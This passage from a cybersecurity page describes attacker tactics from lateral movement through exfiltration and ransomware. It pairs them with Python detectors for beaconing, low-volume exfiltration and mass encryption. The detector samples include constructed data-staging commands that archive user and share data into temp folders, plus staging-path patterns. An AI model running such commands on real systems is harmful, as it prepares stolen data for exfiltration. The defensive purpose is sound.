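            in_window = [e for e in evs[i:] if e[0] - start <= window]
            new_hosts = sorted({dst for _, _, dst, _ in in_window if (account, dst) not in baseline})
            if len(new_hosts) < min_new_hosts:
                continue
            alerts.append({
                "account": account,
                "sources": sorted({src for _, src, _, _ in in_window}),
                "new_hosts": new_hosts,
                "services": sorted({s for _, _, _, s in in_window}),
                "start": start.isoformat(),
                # business_hours is assumed to be expressed in the same zone as the timestamps
                "off_hours": not (business_hours[0] <= start.hour < business_hours[1]),
            })
            break  # report the first qualifying window per account
    return alerts


if __name__ == "__main__":
    for alert in find_lateral_fanout(SAMPLE_LOGONS, BASELINE_PAIRS):
        print(alert)
```

    A backup service account touching its usual file servers stays quiet; a workstation user account opening interactive sessions to a database server and a domain controller at 02:00 does not. Building the baseline from successful logons only, and per account rather than per source host, keeps the comparison meaningful when the attacker pivots from a second machine.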

    Software Deployment Tools

    Enterprise tools like SCCM are abused to deploy malware.
    These tools are trusted and widely used in organizations.
    Attackers leverage them for large-scale propagation.
    Monitoring misuse of deployment tools is essential.

    Collection

    Overview

    Collection involves gathering sensitive data and information that attackers aim to exfiltrate. This includes credentials, documents, communications, and system data.

    Techniques

    Adversary-in-the-Middle (4)

    Attackers intercept internal communications to capture data.
    This includes credentials and sensitive information.
    Often involves proxying or network interception.
    Common in advanced targeted attacks.

    Archive Collected Data (3)

    Data is compressed or archived before exfiltration.
    This reduces size and helps evade detection.
    Common formats include ZIP or RAR files.
    Monitoring large archive creation is important.
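    The archive creation monitoring this entry asks for, as an added example that is not code from this page or from any product: it scores constructed process command lines for the signals that separate staging for exfiltration from routine packaging, namely a password-protected archive, output dropped in a temp or public location, and inputs drawn from user or file-share data. The tool list, the flag handling, the staging-path patterns and the hypothetical list of sensitive directories are assumptions to tune per environment.

```python
"""Score archiver command lines for data-staging indicators.

Added example for this page, not code from the page or any product.
Command lines are constructed samples; path patterns are assumptions.
"""
import re

ARCHIVERS = {"7z", "7za", "rar", "winrar", "zip", "tar"}
# Locations commonly used to stage data before exfiltration (assumption).
STAGING_RE = re.compile(
    r"(ProgramData|Users\\Public|AppData\\Local\\Temp|\\Windows\\Temp|/tmp/|/dev/shm/|/\.[^/\\]+/)", re.I)
# Hypothetical list of data locations worth protecting, plus any UNC share path.
SENSITIVE_RE = re.compile(r"[\\/](Documents|Desktop|Finance|HR|Payroll)(?:[\\/]|$)|^\\\\[^\\]+\\", re.I)

# Constructed samples: three staging commands, one extraction, one routine backup.
SAMPLE_COMMANDS = [
    r'"C:\Program Files\7-Zip\7z.exe" a -t7z -pS3cret! -mhe=on C:\Users\Public\stage.7z C:\Users\jdoe\Documents\* C:\Finance\*',
    r"rar.exe a -hpP@ss -r C:\ProgramData\out.rar \\FS01\share\HR",
    r"tar -czf /tmp/.x/backup.tgz /home/alice/Documents",
    r'"C:\Program Files\7-Zip\7z.exe" x update.zip',
    r"tar -czf /var/backups/etc-2026-05-08.tgz /etc",
]


def _tokenize(cmd):
    # Minimal tokenizer: double-quoted runs stay together, otherwise split on whitespace.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def _tool_name(argv0):
    name = re.split(r"[\\/]", argv0)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def _is_creation(tool, args):
    if not args:
        return False
    if tool in ("7z", "7za", "rar", "winrar"):
        return args[0].lower() == "a"          # "a" = add to / create archive
    if tool == "tar":
        flags = args[0]
        return flags == "--create" or (not flags.startswith("--") and "c" in flags.lstrip("-"))
    return True                                # zip always creates or updates


def _has_password_flag(tool, args):
    for arg in args:
        low = arg.lower()
        if tool in ("7z", "7za", "rar", "winrar") and (low.startswith(("-p", "-hp")) or low == "-mhe=on"):
            return True
        if tool == "zip" and (arg.startswith("-P") or arg == "-e"):
            return True
    return False


def score_archive_command(cmd):
    """Return None for non-archive-creation commands, else a scored summary."""
    tokens = _tokenize(cmd)
    if not tokens:
        return None
    tool, args = _tool_name(tokens[0]), tokens[1:]
    if tool not in ARCHIVERS or not _is_creation(tool, args):
        return None
    # Positional arguments after the verb or flag cluster: archive first, then inputs
    # (assumes tar's -f is the last letter of its flag cluster).
    positional = [a for a in (args if tool == "zip" else args[1:]) if not a.startswith("-")]
    output, inputs = (positional[0], positional[1:]) if positional else (None, [])
    reasons = []
    if _has_password_flag(tool, args):
        reasons.append("password-protected archive")
    if output and STAGING_RE.search(output):
        reasons.append("archive written to staging/temp location")
    if any(SENSITIVE_RE.search(p) for p in inputs):
        reasons.append("inputs include user or share data")
    return {"tool": tool, "output": output, "inputs": inputs, "score": len(reasons), "reasons": reasons}


def suspicious_archives(commands, min_score=2):
    flagged = []
    for cmd in commands:
        result = score_archive_command(cmd)
        if result and result["score"] >= min_score:
            flagged.append(result)
    return flagged


if __name__ == "__main__":
    for hit in suspicious_archives(SAMPLE_COMMANDS):
        print(hit)
```

    Extraction commands and a system backup written to its normal location score zero or are ignored, which keeps the rule from firing on every nightly job; a size check from the file-creation event can be joined on the output path to add the "large archive" signal the entry mentions.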

    Audio Capture

    Attackers record audio from microphones on compromised devices.
    This can capture sensitive conversations.
    It is often used in espionage scenarios.
    Requires endpoint monitoring to detect.

    Automated Collection

    Scripts or tools automatically gather data from systems.
    This includes files, logs, or database content.
    It increases efficiency and speed of data collection.
    Detection involves identifying abnormal automation behavior.

    Browser Information Discovery

    Browser data such as history, bookmarks, saved logins, cookies and session tokens is collected.
    History and bookmarks reveal internal applications worth targeting; tokens let the attacker resume the user's sessions.
    It enables account hijacking or session reuse without a password.
    Often overlaps with credential access techniques such as web session cookie theft.

    Clipboard Data

    Attackers monitor clipboard contents for sensitive information.
    This may include passwords or copied data.
    It is a low-noise data collection method.
    Detection is difficult without endpoint visibility.

    Command and Control (C2)

    Overview

    Command and Control enables attackers to communicate with compromised systems, issue commands, and receive data. This phase is essential for maintaining control over infected environments.

    Techniques

    Application Layer Protocol (5)

    Attackers use protocols like HTTP, HTTPS, or DNS for communication.
    This blends malicious traffic with normal network activity.
    It helps bypass network security controls.
    Traffic analysis is required for detection.

    Communication Through Removable Media

    Data and commands are transferred using removable media like USB drives.
    This is useful in air-gapped environments.
    It avoids network-based detection mechanisms.
    Device control policies can mitigate this risk.

    Data Encoding (2)

    Data is encoded to evade detection during transmission.
    This may include Base64 or custom encoding schemes.
    It helps hide malicious content in normal traffic.
    Decoding and inspection are required for analysis.

    Data Obfuscation (2)

    Attackers disguise C2 traffic so that it does not look like command traffic.
    This includes padding it with junk data, hiding it with steganography, or impersonating a legitimate protocol.
    It complicates detection and analysis.
    Security tools must detect behavioral patterns, not just signatures.

    Dynamic Resolution (3)

    Attackers use techniques like DNS-based resolution to change endpoints.
    This includes fast-flux or domain rotation.
    It makes blocking infrastructure more difficult.
    DNS monitoring is essential.

    Encrypted Channel (2)

    Encrypted channels such as TLS (HTTPS) or VPN tunnels are used for C2 communication.
    This protects attacker traffic from payload inspection.
    It blends with legitimate encrypted traffic.
    Detection relies on TLS inspection where policy allows it, plus metadata such as certificate details, TLS fingerprints and beaconing patterns.
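    The metadata-based traffic analysis that the Application Layer Protocol and Encrypted Channel entries both point to, as an added example that is not code from this page or from any product: since the payload of an HTTPS beacon is opaque, it scores each (client, server) pair in a constructed proxy log on the regularity of its connection timing and request sizes, which is what distinguishes a periodic implant check-in from human browsing to the same port. The log format, the minimum connection count and the coefficient-of-variation threshold are assumptions.

```python
"""Detect beacon-like regularity in proxy connection metadata.

Added example for this page, not code from the page or any product.
The log below is a constructed sample in an assumed space-separated format.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Constructed: 10.1.2.3 contacts 198.51.100.44:443 about once a minute with
# near-identical request sizes; 10.1.2.9 browses an ordinary site in bursts.
SAMPLE_PROXY_LOG = """\
2026-05-08T10:00:00Z 10.1.2.3 198.51.100.44:443 out=412 in=1290
2026-05-08T10:01:02Z 10.1.2.3 198.51.100.44:443 out=418 in=1290
2026-05-08T10:02:00Z 10.1.2.3 198.51.100.44:443 out=409 in=1301
2026-05-08T10:03:01Z 10.1.2.3 198.51.100.44:443 out=415 in=1290
2026-05-08T10:04:00Z 10.1.2.3 198.51.100.44:443 out=412 in=1288
2026-05-08T10:05:00Z 10.1.2.3 198.51.100.44:443 out=420 in=1290
2026-05-08T10:06:03Z 10.1.2.3 198.51.100.44:443 out=411 in=1295
2026-05-08T10:07:00Z 10.1.2.3 198.51.100.44:443 out=414 in=1290
2026-05-08T10:08:00Z 10.1.2.3 198.51.100.44:443 out=413 in=1290
2026-05-08T10:00:00Z 10.1.2.9 93.184.216.34:443 out=1210 in=48211
2026-05-08T10:00:03Z 10.1.2.9 93.184.216.34:443 out=640 in=220104
2026-05-08T10:00:04Z 10.1.2.9 93.184.216.34:443 out=388 in=9034
2026-05-08T10:00:49Z 10.1.2.9 93.184.216.34:443 out=2210 in=151300
2026-05-08T10:04:09Z 10.1.2.9 93.184.216.34:443 out=512 in=30211
2026-05-08T10:04:11Z 10.1.2.9 93.184.216.34:443 out=3400 in=404
2026-05-08T10:14:11Z 10.1.2.9 93.184.216.34:443 out=905 in=77720
2026-05-08T10:14:16Z 10.1.2.9 93.184.216.34:443 out=1100 in=12000
2026-05-08T10:14:17Z 10.1.2.9 93.184.216.34:443 out=470 in=6400
"""


def parse_proxy_log(text):
    """Return (client, server, epoch seconds, bytes out) tuples from the sample format."""
    conns = []
    for line in text.strip().splitlines():
        stamp, client, server, out_field, _in_field = line.split()
        t = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc).timestamp()
        conns.append((client, server, t, int(out_field.split("=")[1])))
    return conns


def find_beacons(conns, min_connections=8, max_interval_cv=0.2):
    """Flag pairs whose inter-connection gaps have a low coefficient of variation.

    CV = population standard deviation / mean; a human produces bursts and long
    idle gaps (CV well above 1), a timer with modest jitter stays near 0."""
    by_pair = defaultdict(list)
    for client, server, t, out_b in conns:
        by_pair[(client, server)].append((t, out_b))
    results = []
    for (client, server), evs in by_pair.items():
        if len(evs) < min_connections:
            continue
        evs.sort()
        gaps = [b[0] - a[0] for a, b in zip(evs, evs[1:])]
        sizes = [s for _, s in evs]
        mean_gap = statistics.mean(gaps)
        interval_cv = statistics.pstdev(gaps) / mean_gap if mean_gap else float("inf")
        size_cv = statistics.pstdev(sizes) / statistics.mean(sizes)
        if interval_cv <= max_interval_cv:
            results.append({"client": client, "server": server, "connections": len(evs),
                            "mean_interval_s": round(mean_gap, 1),
                            "interval_cv": round(interval_cv, 3), "size_cv": round(size_cv, 3)})
    return results


if __name__ == "__main__":
    for beacon in find_beacons(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print(beacon)
```

    Nothing in the rule depends on seeing inside TLS; in a real deployment the same per-pair statistics are computed over hours or days, and low size variance is a second signal because an idle implant sends the same "nothing to report" request each time. Long-interval implants and heavily jittered ones need a longer observation window or a different statistic, so this is one detector among several, not a complete answer.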

    Attack Matrix: Exfiltration and Impact

    What This Phase Covers

    The final stage of a cyberattack focuses on extracting valuable data (Exfiltration) and executing the attacker’s ultimate objective (Impact).

    At this point, attackers have:

    • Established persistence
    • Escalated privileges
    • Moved laterally
    • Collected sensitive data

    Now, they either steal data for financial/espionage purposes or disrupt systems to cause damage.

    This phase represents the highest business risk, often leading to:

    • Data breaches
    • Ransomware incidents
    • Operational downtime
    • Regulatory and financial consequences

    Exfiltration

    Overview

    Exfiltration techniques are used to transfer stolen data out of the victim environment. Attackers aim to move data stealthily while avoiding detection by security controls.

    Techniques

    Automated Exfiltration (1)

    Attackers use scripts or tools to automatically transfer data at scale.
    This reduces manual effort and speeds up data theft.
    Automation can occur continuously or at scheduled intervals.
    Detection requires monitoring abnormal outbound traffic patterns.

    Data Transfer Size Limits

    Attackers cap the size of each transfer so that no single transfer trips a volume threshold.
    Small, incremental transfers blend with normal network activity.
    This technique helps bypass size-based data loss prevention (DLP) and network alerting.
    Detection requires aggregating per-host outbound volume over long windows rather than alerting per transfer.

    Exfiltration Over Alternative Protocol (3)

    Data is exfiltrated using uncommon or less-monitored protocols.
    Examples include DNS tunneling or ICMP-based transfer.
    These protocols often bypass traditional security controls.
    Detection requires protocol-aware traffic analysis.

    Exfiltration Over C2 Channel

    Stolen data is sent through established command-and-control channels.
    This blends exfiltration with normal attacker communication.
    Encrypted C2 channels make detection more difficult.
    Monitoring C2 traffic is critical to identifying data leaks.
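    The long-window aggregation that the Automated Exfiltration, Data Transfer Size Limits and Exfiltration Over C2 Channel entries all depend on, as an added example that is not code from this page or from any product: it sums outbound bytes per (client, destination) over a sliding 24-hour window of constructed flow records, so that 48 scheduled transfers that each stay under a per-transfer limit still surface when their total and their upload-to-download ratio are out of line for the host. The flow records, the limit, the daily threshold and the ratio are assumptions.

```python
"""Aggregate small outbound transfers to expose low-and-slow exfiltration.

Added example for this page, not code from the page or any product.
Flow records are generated here as a constructed sample; limits are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def make_sample_flows():
    """Constructed flows: (start time, client, destination, bytes out, bytes in)."""
    t0 = datetime(2026, 5, 8, 0, 0, tzinfo=timezone.utc)
    flows = []
    # Scheduled every 30 minutes, 900 KB out each: under an assumed 1 MB per-transfer limit.
    for i in range(48):
        flows.append((t0 + timedelta(minutes=30 * i), "10.1.2.3", "198.51.100.44", 900_000, 4_000))
    # Ordinary download-heavy traffic from another client.
    for i in range(20):
        flows.append((t0 + timedelta(minutes=7 * i), "10.1.2.9", "93.184.216.34", 20_000, 2_000_000))
    return flows


def find_low_and_slow(flows, window=timedelta(hours=24), per_transfer_limit=1_000_000,
                      total_threshold=20_000_000, min_out_in_ratio=3.0):
    """Alert per (client, destination) whose busiest `window` exceeds `total_threshold`
    bytes out with an upload-heavy ratio, regardless of how small each transfer was."""
    by_pair = defaultdict(list)
    for t, src, dst, out_b, in_b in flows:
        by_pair[(src, dst)].append((t, out_b, in_b))
    alerts = []
    for (src, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e[0])
        best = None
        for i, (start, _, _) in enumerate(evs):           # window anchored at each transfer
            in_win = [e for e in evs[i:] if e[0] - start <= window]
            total_out = sum(o for _, o, _ in in_win)
            if best is None or total_out > best["total_out"]:
                total_in = sum(n for _, _, n in in_win)
                largest = max(o for _, o, _ in in_win)
                best = {"src": src, "dst": dst, "window_start": start.isoformat(),
                        "transfers": len(in_win), "total_out": total_out, "max_transfer": largest,
                        "all_under_per_transfer_limit": largest <= per_transfer_limit,
                        "out_in_ratio": total_out / total_in if total_in else float("inf")}
        if best["total_out"] >= total_threshold and best["out_in_ratio"] >= min_out_in_ratio:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in find_low_and_slow(make_sample_flows()):
        print(alert)
```

    The `all_under_per_transfer_limit` field is what makes the case: every individual transfer would pass a per-event DLP rule, and only the 24-hour total and the 225:1 upload ratio give it away. The ratio matters because an established C2 channel usually carries small tasking downstream and comparatively large results upstream, which is the opposite of most user traffic.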

    Exfiltration Over Other Network Medium (2)

    Attackers send data over a medium other than the primary C2 channel, such as Wi-Fi, cellular, or Bluetooth.
    This may include a rogue access point or a tethered phone reachable from the compromised host.
    It bypasses controls that only watch the corporate wired network.
    Detection involves monitoring endpoints for unexpected network adapters, connections and routes.

    Exfiltration Over Physical Medium

    Data is exfiltrated using physical devices like USB drives or external disks.
    This is common in air-gapped or highly secure environments.
    It bypasses network-based defenses entirely.
    Strict device control policies are essential for mitigation.

    Impact

    Overview

    Impact techniques represent the final objective of the attacker, where they disrupt systems, destroy data, or demand ransom. This phase often causes the most visible and damaging consequences.

    Techniques

    Account Access Removal

    Attackers lock out legitimate users by changing credentials or disabling accounts.
    This prevents recovery and response efforts.
    It is often used during ransomware attacks.
    Monitoring sudden access changes is critical.

    Data Destruction (1)

    Files, databases, or entire volumes are deleted or overwritten so that they cannot be recovered.
    This often targets backups, volume shadow copies, and logs before production systems.
    It results in irreversible data loss unless copies exist elsewhere.
    Offline or immutable backups are essential for recovery.

    Data Encrypted for Impact (3)

    Attackers encrypt data to make it inaccessible, typically in ransomware attacks.
    Victims are pressured to pay for decryption keys.
    This disrupts business operations significantly.
    Detection should target the precursors: mass file modification, shadow copy deletion, and ransom note creation.
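    The early detection this entry calls for, as an added example that is not code from this page or from any product: it watches constructed file-write events and flags a process that, within a short window, writes many files whose content has near-maximal Shannon entropy and that share one new extension, which is the footprint of bulk encryption rather than of editing or of a single compressed backup. The events, the entropy threshold, the file count and the window are assumptions; random bytes stand in for ciphertext.

```python
"""Flag processes that mass-write high-entropy files with a uniform new extension.

Added example for this page, not code from the page or any product.
File events are constructed; thresholds are assumptions.
"""
import math
import random
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext or compressed data, 4 to 5 for English text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def make_sample_events():
    """Constructed: (time, process, path, bytes written)."""
    rng = random.Random(7)                              # random bytes stand in for ciphertext
    t0 = datetime(2026, 5, 8, 14, 0, tzinfo=timezone.utc)
    text = b"Quarterly revenue summary for the board, see attached figures. " * 64
    events = []
    ransom = r"C:\Users\jdoe\AppData\Local\Temp\upd.exe"  # hypothetical ransomware binary
    for i in range(12):                                 # 12 files in 12 seconds, all ".locked"
        events.append((t0 + timedelta(seconds=i), ransom,
                       rf"C:\Users\jdoe\Documents\report{i}.docx.locked", rng.randbytes(4096)))
    word = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    events.append((t0 + timedelta(seconds=3), word, r"C:\Users\jdoe\Documents\draft.docx", text))
    events.append((t0 + timedelta(seconds=9), word, r"C:\Users\jdoe\Documents\notes.docx", text))
    seven_zip = r"C:\Program Files\7-Zip\7z.exe"        # one high-entropy file: not a burst
    events.append((t0 + timedelta(seconds=5), seven_zip, r"C:\Users\jdoe\backup.7z", rng.randbytes(4096)))
    return events


def find_encryption_bursts(events, window=timedelta(seconds=30), min_files=10, min_entropy=7.0):
    """One alert per process that writes at least `min_files` high-entropy files
    sharing one extension inside any `window`."""
    by_process = defaultdict(list)
    for t, proc, path, data in events:
        by_process[proc].append((t, path, data))
    alerts = []
    for proc, evs in by_process.items():
        evs.sort(key=lambda e: e[0])
        for i, (start, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - start <= window]
            high = [path for _, path, data in in_window if shannon_entropy(data) >= min_entropy]
            if len(high) < min_files:
                continue
            ext, count = Counter(p.rsplit(".", 1)[-1].lower() for p in high).most_common(1)[0]
            if count >= min_files:
                alerts.append({"process": proc, "files": count, "extension": ext,
                               "start": start.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for alert in find_encryption_bursts(make_sample_events()):
        print(alert)
```

    Entropy alone is not enough, since an archiver or a video encoder also writes high-entropy output; the rate and the uniform new extension are what separate them. An endpoint agent would read only the first few kilobytes of each write to keep the cost per event bounded, and would pair this rule with alerts on shadow copy deletion so that the response starts before the encryption loop finishes.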

    Data Manipulation (3)

    Data is altered to compromise integrity and trust.
    This may include financial records or system configurations.
    It can lead to incorrect decisions and operational issues.
    Integrity monitoring is required to detect changes.

    Defacement (2)

    Websites or applications are altered to display unauthorized content.
    This damages brand reputation and public trust.
    Often used for political or hacktivist motives.
    Web application monitoring can help detect defacement.

    Disk Wipe (2)

    Attackers erase entire disks or systems to render them unusable.
    This causes severe operational disruption.
    It is often used in destructive attacks or as a distraction.
    Recovery depends on backups and incident response readiness.

    Final Key Takeaways: Full Attack Lifecycle

    • Exfiltration focuses on stealthy data theft using multiple channels
    • Impact delivers the attacker’s end goal: disruption, destruction, or ransom
    • Early detection in previous stages can prevent catastrophic outcomes
    • Strong controls across all phases are essential for complete defense coverage

    Why the Attack Matrix Matters in Cybersecurity

    The Attack Matrix is essential for understanding how modern cyberattacks unfold across multiple stages. By using the Attack Matrix, security teams can map attacker behavior, identify gaps in detection, and improve response strategies.

    The Attack Matrix helps organizations:

    • Visualize attacker movement across systems
    • Align defenses with real-world attack techniques
    • Improve threat hunting and incident response

    Without the Attack Matrix, it becomes difficult to correlate isolated security events into a complete attack chain. This makes the Attack Matrix a foundational model for modern cybersecurity operations.

    How to Use the Attack Matrix for Defense

    Organizations can use the Attack Matrix to strengthen their security posture by aligning detection tools and controls with each stage.

    Using the Attack Matrix allows teams to:

    • Detect early reconnaissance signals
    • Stop lateral movement before escalation
    • Prevent data exfiltration and impact

    Security teams that operationalize the Attack Matrix gain better visibility and faster response times across the entire attack lifecycle.

    Attack Matrix in Modern Threat Intelligence

    The Attack Matrix plays a critical role in modern threat intelligence by providing a structured way to analyze attacker behavior. Security teams rely on the Attack Matrix to correlate events, detect anomalies, and prioritize risks. By integrating the Attack Matrix into SIEM and EDR platforms, organizations can improve detection accuracy and reduce response times. The Attack Matrix also supports compliance, risk management, and proactive threat hunting strategies.

    © 2026 Cybersecurity threat & AI Designed by Cybersecurity threat & AI .
